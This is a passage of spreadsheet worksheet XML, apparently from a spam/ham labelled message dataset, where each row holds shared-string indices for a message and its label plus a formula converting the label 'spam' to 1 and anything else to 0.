        <v>6202</v>
      </c>
      <c r="B928" t="s">
        <v>5294</v>
      </c>
      <c r="C928" s="1">
        <f>IF(B928="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A929" t="s">
        <v>6203</v>
      </c>
      <c r="B929" t="s">
        <v>5294</v>
      </c>
      <c r="C929" s="1">
        <f>IF(B929="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A930" t="s">
        <v>6204</v>
      </c>
      <c r="B930" t="s">
        <v>5294</v>
      </c>
      <c r="C930" s="1">
        <f>IF(B930="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A931" t="s">
        <v>6205</v>
      </c>
      <c r="B931" t="s">
        <v>5297</v>
      </c>
      <c r="C931" s="1">
        <f>IF(B931="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A932" t="s">
        <v>6206</v>
      </c>
      <c r="B932" t="s">
        <v>5294</v>
      </c>
      <c r="C932" s="1">
        <f>IF(B932="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A933" t="s">
        <v>6207</v>
      </c>
      <c r="B933" t="s">
        <v>5294</v>
      </c>
      <c r="C933" s="1">
        <f>IF(B933="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A934" t="s">
        <v>6208</v>
      </c>
      <c r="B934" t="s">
        <v>5294</v>
      </c>
      <c r="C934" s="1">
        <f>IF(B934="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A935" t="s">
        <v>6209</v>
      </c>
      <c r="B935" t="s">
        <v>5294</v>
      </c>
      <c r="C935" s="1">
        <f>IF(B935="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A936" t="s">
        <v>6210</v>
      </c>
      <c r="B936" t="s">
        <v>5297</v>
      </c>
      <c r="C936" s="1">
        <f>IF(B936="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A937" t="s">
        <v>6211</v>
      </c>
      <c r="B937" t="s">
        <v>5294</v>
      </c>
      <c r="C937" s="1">
        <f>IF(B937="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A938" t="s">
        <v>6212</v>
      </c>
      <c r="B938" t="s">
        <v>5294</v>
      </c>
      <c r="C938" s="1">
        <f>IF(B938="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A939" t="s">
        <v>6213</v>
      </c>
      <c r="B939" t="s">
        <v>5294</v>
      </c>
      <c r="C939" s="1">
        <f>IF(B939="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A940" t="s">
        <v>6214</v>
      </c>
      <c r="B940" t="s">
        <v>5297</v>
      </c>
      <c r="C940" s="1">
        <f>IF(B940="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A941" t="s">
        <v>6215</v>
      </c>
      <c r="B941" t="s">
        <v>5294</v>
      </c>
      <c r="C941" s="1">
        <f>IF(B941="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A942" t="s">
        <v>6216</v>
      </c>
      <c r="B942" t="s">
        <v>5294</v>
      </c>
      <c r="C942" s="1">
        <f>IF(B942="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A943" t="s">
        <v>6217</v>
      </c>
      <c r="B943" t="s">
        <v>5294</v>
      </c>
      <c r="C943" s="1">
        <f>IF(B943="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A944" t="s">
        <v>6218</v>
      </c>
      <c r="B944" t="s">
        <v>5297</v>
      </c>
      <c r="C944" s="1">
        <f>IF(B944="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A945" t="s">
        <v>6219</v>
      </c>
      <c r="B945" t="s">
        <v>5294</v>
      </c>
      <c r="C945" s="1">
        <f>IF(B945="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A946" t="s">
        <v>6220</v>
      </c>
      <c r="B946" t="s">
        <v>5294</v>
      </c>
      <c r="C946" s="1">
        <f>IF(B946="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A947" t="s">
        <v>6221</v>
      </c>
      <c r="B947" t="s">
        <v>5294</v>
      </c>
      <c r="C947" s="1">
        <f>IF(B947="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A948" t="s">
        <v>6222</v>
      </c>
      <c r="B948" t="s">
        <v>5297</v>
      </c>
      <c r="C948" s="1">
        <f>IF(B948="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A949" t="s">
        <v>6223</v>
      </c>
      <c r="B949" t="s">
        <v>5294</v>
      </c>
      <c r="C949" s="1">
        <f>IF(B949="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A950" t="s">
        <v>6224</v>
      </c>
      <c r="B950" t="s">
        <v>5294</v>
      </c>
      <c r="C950" s="1">
        <f>IF(B950="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A951" t="s">
        <v>6225</v>
      </c>
      <c r="B951" t="s">
        <v>5294</v>
      </c>
      <c r="C951" s="1">
        <f>IF(B951="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A952" t="s">
        <v>6226</v>
      </c>
      <c r="B952" t="s">
        <v>5294</v>
      </c>
      <c r="C952" s="1">
        <f>IF(B952="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A953" t="s">
        <v>6227</v>
      </c>
      <c r="B953" t="s">
        <v>5294</v>
      </c>
      <c r="C953" s="1">
        <f>IF(B953="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A954" t="s">
        <v>6228</v>
      </c>
      <c r="B954" t="s">
        <v>5294</v>
      </c>
      <c r="C954" s="1">
        <f>IF(B954="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A955" t="s">
        <v>6229</v>
      </c>
      <c r="B955" t="s">
        <v>5294</v>
      </c>
      <c r="C955" s="1">
        <f>IF(B955="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A956" t="s">
        <v>6230</v>
      </c>
      <c r="B956" t="s">
        <v>5297</v>
      </c>
      <c r="C956" s="1">
        <f>IF(B956="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A957" t="s">
        <v>6231</v>
      </c>
      <c r="B957" t="s">
        <v>5294</v>
      </c>
      <c r="C957" s="1">
        <f>IF(B957="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A958" t="s">
        <v>6232</v>
      </c>
      <c r="B958" t="s">
        <v>5294</v>
      </c>
      <c r="C958" s="1">
        <f>IF(B958="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A959" t="s">
        <v>6233</v>
      </c>
      <c r="B959" t="s">
        <v>5294</v>
      </c>
      <c r="C959" s="1">
        <f>IF(B959="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A960" t="s">
        <v>6234</v>
      </c>
      <c r="B960" t="s">
        <v>5294</v>
      </c>
      <c r="C960" s="1">
        <f>IF(B960="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A961" t="s">
        <v>6235</v>
      </c>
      <c r="B961" t="s">
        <v>5294</v>
      </c>
      <c r="C961" s="1">
        <f>IF(B961="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A962" t="s">
        <v>6236</v>
      </c>
      <c r="B962" t="s">
        <v>5294</v>
      </c>
      <c r="C962" s="1">
        <f>IF(B962="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A963" t="s">
        <v>6237</v>
      </c>
      <c r="B963" t="s">
        <v>5297</v>
      </c>
      <c r="C963" s="1">
        <f>IF(B963="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A964" t="s">
        <v>5932</v>
      </c>
      <c r="B964" t="s">
        <v>5294</v>
      </c>
      <c r="C964" s="1">
        <f>IF(B964="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A965" t="s">
        <v>6238</v>
      </c>
      <c r="B965" t="s">
        <v>5294</v>
      </c>
      <c r="C965" s="1">
        <f>IF(B965="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A966" t="s">
        <v>5585</v>
      </c>
      <c r="B966" t="s">
        <v>5294</v>
      </c>
      <c r="C966" s="1">
        <f>IF(B966="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A967" t="s">
        <v>6239</v>
      </c>
      <c r="B967" t="s">
        <v>5294</v>
      </c>
      <c r="C967" s="1">
        <f>IF(B967="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A968" t="s">
        <v>6240</v>
      </c>
      <c r="B968" t="s">
        <v>5294</v>
      </c>
      <c r="C968" s="1">
        <f>IF(B968="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A969" t="s">
        <v>6241</v>
      </c>
      <c r="B969" t="s">
        <v>5294</v>
      </c>
      <c r="C969" s="1">
        <f>IF(B969="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A970" t="s">
        <v>6242</v>
      </c>
      <c r="B970" t="s">
        <v>5294</v>
      </c>
      <c r="C970" s="1">
        <f>IF(B970="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A971" t="s">
        <v>6243</v>
      </c>
      <c r="B971" t="s">
        <v>5294</v>
      </c>
      <c r="C971" s="1">
        <f>IF(B971="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A972" t="s">
        <v>6244</v>
      </c>
      <c r="B972" t="s">
        <v>5294</v>
      </c>
      <c r="C972" s="1">
        <f>IF(B972="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A973" t="s">
        <v>6245</v>
      </c>
      <c r="B973" t="s">
        <v>5294</v>
      </c>
      <c r="C973" s="1">
        <f>IF(B973="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A974" t="s">
        <v>6246</v>
      </c>
      <c r="B974" t="s">
        <v>5294</v>
      </c>
      <c r="C974" s="1">
        <f>IF(B974="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A975" t="s">
        <v>6247</v>
      </c>
      <c r="B975" t="s">
        <v>5294</v>
      </c>
      <c r="C975" s="1">
        <f>IF(B975="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A976" t="s">
        <v>6248</v>
      </c>
      <c r="B976" t="s">
        <v>5294</v>
      </c>
      <c r="C976" s="1">
        <f>IF(B976="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A977" t="s">
        <v>6249</v>
      </c>
      <c r="B977" t="s">
        <v>5294</v>
      </c>
      <c r="C977" s="1">
        <f>IF(B977="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A978" t="s">
        <v>6250</v>
      </c>
      <c r="B978" t="s">
        <v>5294</v>
      </c>
      <c r="C978" s="1">
        <f>IF(B978="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A979" t="s">
        <v>6251</v>
      </c>
      <c r="B979" t="s">
        <v>5294</v>
      </c>
      <c r="C979" s="1">
        <f>IF(B979="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A980" t="s">
        <v>6252</v>
      </c>
      <c r="B980" t="s">
        <v>5294</v>
      </c>
      <c r="C980" s="1">
        <f>IF(B980="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A981" t="s">
        <v>6253</v>
      </c>
      <c r="B981" t="s">
        <v>5294</v>
      </c>
      <c r="C981" s="1">
        <f>IF(B981="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A982" t="s">
        <v>6254</v>
      </c>
      <c r="B982" t="s">
        <v>5294</v>
      </c>
      <c r="C982" s="1">
        <f>IF(B982="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A983" t="s">
        <v>6255</v>
      </c>
      <c r="B983" t="s">
        <v>5294</v>
      </c>
      <c r="C983" s="1">
        <f>IF(B983="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A984" t="s">
        <v>6256</v>
      </c>
      <c r="B984" t="s">
        <v>5297</v>
      </c>
      <c r="C984" s="1">
        <f>IF(B984="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A985" t="s">
        <v>6257</v>
      </c>
      <c r="B985" t="s">
        <v>5294</v>
      </c>
      <c r="C985" s="1">
        <f>IF(B985="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A986" t="s">
        <v>6258</v>
      </c>
      <c r="B986" t="s">
        <v>5294</v>
      </c>
      <c r="C986" s="1">
        <f>IF(B986="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="987" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A987" t="s">
        <v>6259</v>
      </c>
      <c r="B987" t="s">
        <v>5294</v>
      </c>
      <c r="C987" s="1">
        <f>IF(B987="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="988" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A988" t="s">
        <v>6260</v>
      </c>
      <c r="B988" t="s">
        <v>5294</v>
      </c>
      <c r="C988" s="1">
        <f>IF(B988="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="989" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A989" t="s">
        <v>6261</v>
      </c>
      <c r="B989" t="s">
        <v>5294</v>
      </c>
      <c r="C989" s="1">
        <f>IF(B989="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="990" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A990" t="s">
        <v>6262</v>
      </c>
      <c r="B990" t="s">
        <v>5294</v>
      </c>
      <c r="C990" s="1">
        <f>IF(B990="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="991" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A991" t="s">
        <v>6263</v>
      </c>
      <c r="B991" t="s">
        <v>5294</v>
      </c>
      <c r="C991" s="1">
        <f>IF(B991="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="992" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A992" t="s">
        <v>6264</v>
      </c>
      <c r="B992" t="s">
        <v>5294</v>
      </c>
      <c r="C992" s="1">
        <f>IF(B992="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="993" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A993" t="s">
        <v>6265</v>
      </c>
      <c r="B993" t="s">
        <v>5294</v>
      </c>
      <c r="C993" s="1">
        <f>IF(B993="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="994" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A994" t="s">
        <v>6266</v>
      </c>
      <c r="B994" t="s">
        <v>5294</v>
      </c>
      <c r="C994" s="1">
        <f>IF(B994="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="995" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A995" t="s">
        <v>6267</v>
      </c>
      <c r="B995" t="s">
        <v>5294</v>
      </c>
      <c r="C995" s="1">
        <f>IF(B995="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="996" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A996" t="s">
        <v>6268</v>
      </c>
      <c r="B996" t="s">
        <v>5294</v>
      </c>
      <c r="C996" s="1">
        <f>IF(B996="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="997" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A997" t="s">
        <v>6269</v>
      </c>
      <c r="B997" t="s">
        <v>5294</v>
      </c>
      <c r="C997" s="1">
        <f>IF(B997="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="998" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A998" t="s">
        <v>6270</v>
      </c>
      <c r="B998" t="s">
        <v>5294</v>
      </c>
      <c r="C998" s="1">
        <f>IF(B998="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="999" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A999" t="s">
        <v>6271</v>
      </c>
      <c r="B999" t="s">
        <v>5294</v>
      </c>
      <c r="C999" s="1">
        <f>IF(B999="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1000" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1000" t="s">
        <v>6272</v>
      </c>
      <c r="B1000" t="s">
        <v>5294</v>
      </c>
      <c r="C1000" s="1">
        <f>IF(B1000="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1001" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1001" t="s">
        <v>6273</v>
      </c>
      <c r="B1001" t="s">
        <v>5294</v>
      </c>
      <c r="C1001" s="1">
        <f>IF(B1001="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1002" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1002" t="s">
        <v>6274</v>
      </c>
      <c r="B1002" t="s">
        <v>5294</v>
      </c>
      <c r="C1002" s="1">
        <f>IF(B1002="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1003" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1003" t="s">
        <v>5481</v>
      </c>
      <c r="B1003" t="s">
        <v>5297</v>
      </c>
      <c r="C1003" s="1">
        <f>IF(B1003="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1004" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1004" t="s">
        <v>5729</v>
      </c>
      <c r="B1004" t="s">
        <v>5294</v>
      </c>
      <c r="C1004" s="1">
        <f>IF(B1004="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1005" t="s">
        <v>6275</v>
      </c>
      <c r="B1005" t="s">
        <v>5294</v>
      </c>
      <c r="C1005" s="1">
        <f>IF(B1005="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1006" t="s">
        <v>6276</v>
      </c>
      <c r="B1006" t="s">
        <v>5294</v>
      </c>
      <c r="C1006" s="1">
        <f>IF(B1006="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1007" t="s">
        <v>6277</v>
      </c>
      <c r="B1007" t="s">
        <v>5294</v>
      </c>
      <c r="C1007" s="1">
        <f>IF(B1007="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1008" t="s">
        <v>6278</v>
      </c>
      <c r="B1008" t="s">
        <v>5297</v>
      </c>
      <c r="C1008" s="1">
        <f>IF(B1008="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1009" t="s">
        <v>6279</v>
      </c>
      <c r="B1009" t="s">
        <v>5294</v>
      </c>
      <c r="C1009" s="1">
        <f>IF(B1009="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1010" t="s">
        <v>6280</v>
      </c>
      <c r="B1010" t="s">
        <v>5294</v>
      </c>
      <c r="C1010" s="1">
        <f>IF(B1010="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1011" t="s">
        <v>6281</v>
      </c>
      <c r="B1011" t="s">
        <v>5294</v>
      </c>
      <c r="C1011" s="1">
        <f>IF(B1011="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1012" t="s">
        <v>6282</v>
      </c>
      <c r="B1012" t="s">
        <v>5294</v>
      </c>
      <c r="C1012" s="1">
        <f>IF(B1012="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1013" t="s">
        <v>6283</v>
      </c>
      <c r="B1013" t="s">
        <v>5294</v>
      </c>
      <c r="C1013" s="1">
        <f>IF(B1013="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1014" t="s">
        <v>6284</v>
      </c>
      <c r="B1014" t="s">
        <v>5294</v>
      </c>
      <c r="C1014" s="1">
        <f>IF(B1014="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1015" t="s">
        <v>6285</v>
      </c>
      <c r="B1015" t="s">
        <v>5294</v>
      </c>
      <c r="C1015" s="1">
        <f>IF(B1015="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1016" t="s">
        <v>6286</v>
      </c>
      <c r="B1016" t="s">
        <v>5294</v>
      </c>
      <c r="C1016" s="1">
        <f>IF(B1016="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1017" t="s">
        <v>6287</v>
      </c>
      <c r="B1017" t="s">
        <v>5294</v>
      </c>
      <c r="C1017" s="1">
        <f>IF(B1017="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1018" t="s">
        <v>6288</v>
      </c>
      <c r="B1018" t="s">
        <v>5297</v>
      </c>
      <c r="C1018" s="1">
        <f>IF(B1018="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1019" t="s">
        <v>6289</v>
      </c>
      <c r="B1019" t="s">
        <v>5294</v>
      </c>
      <c r="C1019" s="1">
        <f>IF(B1019="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1020" t="s">
        <v>6290</v>
      </c>
      <c r="B1020" t="s">
        <v>5294</v>
      </c>
      <c r="C1020" s="1">
        <f>IF(B1020="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1021" t="s">
        <v>6291</v>
      </c>
      <c r="B1021" t="s">
        <v>5294</v>
      </c>
      <c r="C1021" s="1">
        <f>IF(B1021="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1022" t="s">
        <v>6292</v>
      </c>
      <c r="B1022" t="s">
        <v>5294</v>
      </c>
      <c r="C1022" s="1">
        <f>IF(B1022="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1023" t="s">
        <v>6293</v>
      </c>
      <c r="B1023" t="s">
        <v>5297</v>
      </c>
      <c r="C1023" s="1">
        <f>IF(B1023="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1024" t="s">
        <v>6294</v>
      </c>
      <c r="B1024" t="s">
        <v>5294</v>
      </c>
      <c r="C1024" s="1">
        <f>IF(B1024="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1025" t="s">
        <v>6295</v>
      </c>
      <c r="B1025" t="s">
        <v>5294</v>
      </c>
      <c r="C1025" s="1">
        <f>IF(B1025="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1026" t="s">
        <v>6296</v>
      </c>
      <c r="B1026" t="s">
        <v>5294</v>
      </c>
      <c r="C1026" s="1">
        <f>IF(B1026="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1027" t="s">
        <v>6297</v>
      </c>
      <c r="B1027" t="s">
        <v>5294</v>
      </c>
      <c r="C1027" s="1">
        <f>IF(B1027="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1028" t="s">
        <v>6298</v>
      </c>
      <c r="B1028" t="s">
        <v>5294</v>
      </c>
      <c r="C1028" s="1">
        <f>IF(B1028="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1029" t="s">
        <v>6299</v>
      </c>
      <c r="B1029" t="s">
        <v>5294</v>
      </c>
      <c r="C1029" s="1">
        <f>IF(B1029="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1030" t="s">
        <v>6300</v>
      </c>
      <c r="B1030" t="s">
        <v>5294</v>
      </c>
      <c r="C1030" s="1">
        <f>IF(B1030="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1031" t="s">
        <v>6301</v>
      </c>
      <c r="B1031" t="s">
        <v>5294</v>
      </c>
      <c r="C1031" s="1">
        <f>IF(B1031="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1032" t="s">
        <v>6302</v>
      </c>
      <c r="B1032" t="s">
        <v>5294</v>
      </c>
      <c r="C1032" s="1">
        <f>IF(B1032="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1033" t="s">
        <v>6303</v>
      </c>
      <c r="B1033" t="s">
        <v>5294</v>
      </c>
      <c r="C1033" s="1">
        <f>IF(B1033="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1034" t="s">
        <v>6304</v>
      </c>
      <c r="B1034" t="s">
        <v>5294</v>
      </c>
      <c r="C1034" s="1">
        <f>IF(B1034="spam",1,0)</f>
        <v>0</v>
      </c>
